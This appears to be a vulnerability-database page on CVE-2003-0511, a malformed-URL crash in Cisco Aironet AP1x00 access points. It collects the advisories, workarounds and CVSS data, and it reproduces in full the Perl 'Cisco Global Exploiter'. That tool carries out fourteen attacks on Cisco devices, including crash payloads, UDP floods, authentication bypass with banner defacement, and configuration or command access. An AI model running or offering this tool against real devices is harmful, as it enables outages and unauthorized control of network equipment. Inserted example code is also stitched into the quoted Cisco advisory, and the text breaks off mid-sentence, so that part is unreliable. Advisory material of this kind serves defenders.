CVE-2003-0511
CVSS 5.0
Published: 2003-08-27 00:00:00
Revised: 2009-03-04 00:18:24

[Original] The web server for Cisco Aironet AP1x00 Series Wireless devices running certain versions of IOS 12.2 allow remote attackers to cause a denial of service (reload) via a malformed URL.


[CNNVD] Cisco AP1x00 HTTP GET Request Remote Denial of Service Vulnerability (CNNVD-200308-181)

        
        The Cisco Aironet AP1X00 series is a line of wireless access points released by Cisco that provides wireless access based on the 802.11b Wi-Fi standard.
        The web interface of the Cisco Aironet AP1X00 does not correctly handle HTTP GET requests; a remote attacker can exploit this to mount a denial-of-service attack against the device.
        If a Cisco Aironet AP1X00 device exposes its HTTP interface, sending a malformed URL request to the HTTP server can crash the access point. The attack requires no authentication; after a successful attack the device must be restarted before it can serve normal traffic again.
        All Cisco Aironet Access Point 1200 devices running VxWorks-based software are not affected; those software versions include 11.56, 12.01T1, 12.02T1 and 12.03T.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:cisco:ios:12.2%284%29ja1  Cisco IOS 12.2 (4)JA1
cpe:/o:cisco:ios:12.2%2811%29ja  Cisco IOS 12.2 (11)JA
cpe:/o:cisco:ios:12.2%284%29ja   Cisco IOS 12.2 (4)JA
cpe:/o:cisco:ios:12.2%288%29ja   Cisco IOS 12.2 (8)JA

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5834  Cisco Aironet Wireless Devices DoS
*OVAL describes in detail how to detect this vulnerability; more technical detail on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0511
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0511
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-181
(official data source) CNNVD

- Other links and resources

http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
(UNKNOWN)  MISC  http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml
(UNKNOWN)  CISCO  20030728 HTTP GET Vulnerability in AP1x00
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0055.html
(VENDOR_ADVISORY)  VULNWATCH  20030728 Cisco Aironet AP 1100 Malformed HTTP Request Crash Vulnerability

- Vulnerability Information

Cisco AP1x00 HTTP GET Request Remote Denial of Service Vulnerability
Medium  Other
2003-08-27 00:00:00 2009-03-04 00:00:00
Remote
        

- Advisories and Patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Disable the HTTP service on the device, or restrict user access to it.
        Vendor patch:
        Cisco
        -----
        Cisco advises users to upgrade the firmware to version 12.2(11)JA1:
        
        http://www.cisco.com/tacpage/sw-center/sw-ios.shtml

- Vulnerability Information (22962)

Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability (EDBID:22962)
hardware dos
2003-07-28 Verified
0 blackangels
N/A
source: http://www.securityfocus.com/bid/8290/info

Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = $ARGV[0];
$expvuln = $ARGV[1];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string = $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string = $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\n\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  # read the response before closing the socket
  while (<$sockd>){ print }
  close($sockd);
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}
		

- Vulnerability Information (F31463)

VIGILANTE-2003001.txt (PacketStormID:F31463)
2003-07-29 00:00:00
Reda Zitouni  vigilante.com
advisory,web
cisco
CVE-2003-0511

Vigilante Advisory 2003001 - It is possible to cause Cisco Aironet Access Point to crash and reboot if the HTTP server feature is enabled. This can be accomplished by submitting a specially crafted request to the web server. There is no need to authenticate to perform this attack, only access to the web server is required. The Aironet bridge reboots upon receiving the request and failing to handle it correctly. Afterwards, no further access to the WLAN or its services is possible.

VIGILANTe Security Watch Advisory
 
Name: Cisco Aironet AP 1100 Malformed HTTP Request Crash Vulnerability
Systems Affected: Tested on a Cisco Aironet AP1100 Model 1120B Series
Wireless device.
Firmware version 12.2(4)JA and earlier.
Severity: High Risk
Vendor URL: http://www.vigilante.com
Authors: Reda Zitouni (reda.zitouni@vigilante.com)
Date: 28th July 2003
Advisory Code: VIGILANTE-2003001
 
Description
***********
Cisco Aironet 1100 Series Access Point is a device manufactured by Cisco
Systems offering a WLAN solution based on the 802.11b Wifi standard.
The Aironet Bridge is vulnerable to a denial of service. This can be
exploited remotely by an attacker. No user login or password is
necessary.
 
Details
*******
 
It is possible to cause Cisco Aironet Access Point to crash and reboot
if the HTTP server feature is enabled. This can be accomplished by
submitting a specially crafted request to the web server. There is no
need to authenticate to perform this attack, only access to the web
server is required. The Aironet bridge reboots upon receiving the
request and failing to handle it correctly. Afterwards, no further
access to the WLAN or its services is possible.
 
Vendor status:
**************
Cisco was contacted June 19, 2003 and answered the same day. 5 days
later, they told us that they would release a patch soon. The patch was
finally released July 3, 2003.
 
Vulnerability Assessment:
A test case to detect this vulnerability was added to SecureScan NX in
the upgrade package of July 28, 2003. You can see the documentation of
this test case 17655 on SecureScan NX web site at
http://securescannx.vigilante.com/tc/17655 . 
Fix:  A firmware upgrading the Aironet IOS version to c1100-k9w7 has
been released by Cisco. Please note that this version fixes some other
bugs as TC 15438 (refer to release note).
 
Workaround:
***********
1. If not needed - disable access to the web feature on the Aironet
Bridge. 
2. If needed - restrict access to the HTTP service for outside
connections.
CVE: Common Vulnerabilities and Exposures group ( reachable at
http://cve.mitre.org/ ) was contacted and assigned CAN-2003-0511 to this
vulnerability. 
 
Links:
*****
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml
Vigilante Advisory:
http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
Product Homepage:  http://www.cisco.com/warp/public/cc/pd/witc/ps4570
CVE: CAN-2003-0511
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CAN-2003-0511
 

Credit:
******
This vulnerability was discovered by Reda Zitouni, member of our
Security Watch Team at VIGILANTe. 
We wish to thank Cisco PSIRT Team for their fast answer to fix this
problem. 
 
Copyright VIGILANTe.com, Inc. 2003-07-28
 
Disclaimer:
**********
The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any consequences whatsoever arising out
of or in connection with the use or spread of this information. Any use
of this information lays within the user's responsibility.
 
Feedback:
********
Please send suggestions, updates, and comments to
securitywatch@vigilante.com.
 
 
    

- Vulnerability Information (F31462)

ciscoHTTP.txt (PacketStormID:F31462)
2003-07-29 00:00:00
Cisco Systems PSIRT  
advisory,denial of service
cisco
CVE-2003-0511

Cisco Security Advisory - Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device to reload resulting in a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

           Cisco Security Advisory: HTTP GET Vulnerability in AP1x00

Revision 1.0

  For Public Release 2003 July 28 16:00 UTC (GMT)

     ----------------------------------------------------------------------

Contents

     Summary
     Affected Products
     Details
     Impact
     Software Versions and Fixes
     Obtaining Fixed Software
     Workarounds
     Exploitation and Public Announcements
     Status of This Notice: FINAL
     Distribution
     Revision History
     Cisco Security Procedures

     ----------------------------------------------------------------------

Summary

   A vulnerability has been reported by an external researcher in Cisco
   IOS(R) release for Cisco Aironet AP1x00 Series Wireless devices. The
   vulnerability affects only IOS-based Cisco Aironet Wireless products. The
   VxWorks based Cisco Aironet Wireless Devices are not affected. This
   vulnerability can cause the AP1x00 to reload and is documented as Cisco
   bug ID CSCeb49869 (also CAN-2003-0511). There
   are workarounds available to mitigate the effects of this vulnerability.

   This advisory is posted at
   http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml.

   The external report can be found at
   http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003002.htm.
   Although it mentions two issues, only one is addressed by this advisory.
   The other issue, Cisco bug ID CSCdz29724 (also CAN-2003-512), is present
   in all IOS software and is duplicated by the AP1x00 specific Cisco bug ID
   CSCeb49842. More details about it can be found at
   http://www.cisco.com/warp/public/707/cisco-sn-20030724-ios-enum.shtml.

Affected Products

   Only the following Cisco IOS-based wireless Access Points are affected:

   +------------------------------------------+
   |   Hardware Model   | Software Release(s) |
   |--------------------+---------------------|
   |Cisco Aironet       |12.2(4)JA,           |
   |Wireless Access     |12.2(4)JA1,          |
   |Point AP1100 series |12.2(8)JA, 12.2(11)JA|
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Access     |12.2(8)JA, 12.2(11)JA|
   |Point AP1200 series |                     |
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Bridge     |12.2(11)JA           |
   |AP1400 series       |                     |
   +------------------------------------------+

   All previous VxWorks-based software releases for Cisco Aironet Access
   Point 1200 are not affected. That includes the following, and earlier,
   software releases: 11.56, 12.01T1, 12.02T1, 12.03T.

   In order to determine your software release you should log on the Access
   Point using any account available and execute the following command:

 access-point> show ver

 Cisco Internetwork Operating System Software
 IOS (tm) C1100 Software (C1100-K9W7-M), Version 12.2(8)JA, EARLY
                                                 ^^^^^^^^^
 DEPLOYMENT RELEASE SOFTWARE (fc1)
 TAC Support: http://www.cisco.com/tac
 Copyright (c) 1986-2003 by cisco Systems, Inc.

   The Cisco IOS software version is displayed in the second line of the
   output. In this example it is 12.2(8)JA.
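A version check that applies the advisory's affected-release table, added here as an example and not Cisco's own tooling: it pulls the `Version` token out of `show ver` output like the excerpt above, reports which models the advisory lists that release for, and decides whether the release is earlier than the 12.2(11)JA1 fix. The `show ver` text inside the block is constructed from the excerpt above; treating only releases in the same train (JA) as comparable, and reading a later JA release as fixed, are assumptions of this example.

```python
import re
from typing import NamedTuple

# Affected releases, copied from the advisory's "Affected Products" table.
AFFECTED = {
    "AP1100": {"12.2(4)JA", "12.2(4)JA1", "12.2(8)JA", "12.2(11)JA"},
    "AP1200": {"12.2(8)JA", "12.2(11)JA"},
    "AP1400": {"12.2(11)JA"},
}
FIXED_RELEASE = "12.2(11)JA1"  # per "Software Versions and Fixes"

# Matches the "Version 12.2(8)JA" token on the second line of "show ver".
VERSION_RE = re.compile(r"\bVersion\s+(\d+\.\d+\(\d+\)[A-Z]+\d*)")


class IosVersion(NamedTuple):
    """12.2(11)JA1 -> major 12, minor 2, maintenance 11, train JA, rebuild 1."""
    major: int
    minor: int
    maint: int
    train: str
    rebuild: int

    @classmethod
    def parse(cls, text: str) -> "IosVersion":
        m = re.fullmatch(r"(\d+)\.(\d+)\((\d+)\)([A-Z]+)(\d*)", text.strip())
        if m is None:
            raise ValueError(f"not an IOS release string: {text!r}")
        return cls(int(m[1]), int(m[2]), int(m[3]), m[4], int(m[5] or 0))

    def order_key(self) -> tuple:
        # Ordering is only meaningful within one train (assumption of this example).
        return (self.major, self.minor, self.maint, self.rebuild)


def extract_version(show_ver_output: str) -> str:
    """Return the raw release string (e.g. '12.2(8)JA') from show ver output."""
    m = VERSION_RE.search(show_ver_output)
    if m is None:
        raise ValueError("no IOS release string found in show ver output")
    return m.group(1)


def assess(show_ver_output: str) -> dict:
    """Return the release, the models the advisory lists it for, and a verdict."""
    raw = extract_version(show_ver_output)
    ver = IosVersion.parse(raw)
    fixed = IosVersion.parse(FIXED_RELEASE)
    listed_for = sorted(model for model, rels in AFFECTED.items() if raw in rels)
    if ver.train != fixed.train:
        verdict = "unknown-train"       # a non-JA image; not comparable here
    elif ver.order_key() < fixed.order_key():
        verdict = "vulnerable"          # earlier than the fix
    else:
        verdict = "fixed"               # the fix release or a later JA release
    return {"version": raw, "listed_for": listed_for, "verdict": verdict}


# Constructed sample, copied from the advisory's show ver excerpt.
SAMPLE_SHOW_VER = """\
Cisco Internetwork Operating System Software
IOS (tm) C1100 Software (C1100-K9W7-M), Version 12.2(8)JA, EARLY DEPLOYMENT RELEASE SOFTWARE (fc1)
TAC Support: http://www.cisco.com/tac
Copyright (c) 1986-2003 by cisco Systems, Inc.
"""

if __name__ == "__main__":
    print(assess(SAMPLE_SHOW_VER))
```

Run against the excerpt above it reports `12.2(8)JA`, listed for AP1100 and AP1200, verdict `vulnerable`; a device showing `12.2(11)JA` is still reported vulnerable because the rebuild number 0 sorts before the `JA1` rebuild.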

Details

   Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device
   to reload.

Impact

   Repeated exploitation of this vulnerability can lead to a prolonged
   Denial-of-Service (DoS) of the AP1x00.

Software Versions and Fixes

   The vulnerability is fixed in the 12.2(11)JA1 version of the software for
   all Cisco Aironet AP1x00 devices.

Obtaining Fixed Software

   Cisco is offering free software upgrades to address these vulnerabilities
   for all affected customers. Customers may only install and expect support
   for the feature sets they have purchased. By installing, downloading,
   accessing or otherwise using such software upgrades, customers agree to be
   bound by the terms of Cisco's software license terms found at
   http://www.cisco.com/public/sw-license-agreement.html, or as otherwise set
   forth at the Cisco Connection Online Software Center at
   http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

   Customers with service contracts should contact their regular update
   channels to obtain the free software upgrade identified via this advisory.
   For most customers with service contracts, this means that upgrades should
   be obtained through the Software Center on Cisco's worldwide website at
   http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml. To access the
   software download URL, you must be a registered user and you must be
   logged in.

   Customers whose Cisco products are provided or maintained through prior or
   existing agreement with third-party support organizations such as Cisco
   Partners, authorized resellers, or service providers should contact that
   support organization for assistance with the upgrade, which should be free
   of charge.

   Customers who purchase direct from Cisco but who do not hold a Cisco
   service contract and customers who purchase through third-party vendors
   but are unsuccessful at obtaining fixed software through their point of
   sale should get their upgrades by contacting the Cisco Technical
   Assistance Center (TAC). TAC contacts are as follows.

     * +1 800 553 2447 (toll free from within North America)

     * +1 408 526 7209 (toll call from anywhere in the world)

     * e-mail: tac@cisco.com

   Please have your product serial number available and give the URL of this
   notice as evidence of your entitlement to a free upgrade. Free upgrades
   for non-contract customers must be requested through the TAC.

   Please do not contact either "psirt@cisco.com" or
   "security-alert@cisco.com" for software upgrades.

Workarounds

   There are two workarounds for this vulnerability. One is to use
   access-class or access-list commands to limit the access to legitimate
   hosts only, and another workaround is to disable HTTP and use SSH to
   administer the Cisco Aironet Access Point.

   The example of using access-class is given here:

 ap(config)# ip http access-class 10
 ap(config)# access-list 10 permit host 10.0.0.1

   In this example, host 10.0.0.1 is the only one that is allowed to access
   the AP. All other hosts are prohibited.

   To disable HTTP and enable SSH use this example:

 ap(config)# no ip http server
 ap(config)# ip domain name <your-domain>
 ap(config)# crypto key generate rsa
 The name for the keys will be: ap.your-domain
 Choose the size of the key modulus in the range of 360 to 2048 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.

 How many bits in the modulus [512]: 1024
 % Generating 1024 bit RSA keys ...[OK]
 ap(config)# line vty 0 4
 ap(config-line)# transport input ssh

   Now you can connect to the Cisco Aironet AP using an SSH client from your
   computer. There are many free and commercial versions of SSH software
   available.

   In addition to the workarounds, it is possible to mitigate the exposure by
   configuring ACLs on the device so that only legitimate hosts can use the
   HTTP service. This can be done in the following way:

 access-list 111 permit tcp host 10.0.0.1 host 10.0.0.50 eq www

   In this example, host 10.0.0.1 is the only one that is allowed to
   access the device at 10.0.0.50. You will have to change the host IP
   addresses and the ACL number to suit your configuration. This ACL will
   have to be applied to all interfaces and cover all IP addresses assigned
   to the affected device.
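   The following audit script is an added example, not part of the Cisco
   advisory: it parses an AP running-config excerpt and reports whether the
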